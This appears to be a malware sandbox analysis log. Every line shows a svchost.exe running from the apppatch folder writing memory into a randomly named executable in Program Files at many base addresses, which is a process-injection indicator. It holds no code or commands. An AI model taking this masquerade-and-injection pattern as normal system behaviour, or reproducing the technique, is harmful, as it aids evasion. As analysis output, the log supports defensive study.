Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1420000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1421000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1422000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1475000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1210000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1211000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1212000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1265000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1615000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1275000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 655000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1090000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1091000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 10E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1635000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1390000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1391000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1392000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 13E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1215000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 870000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 871000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 872000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 8C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1355000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 655000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B65000Jump to behavior
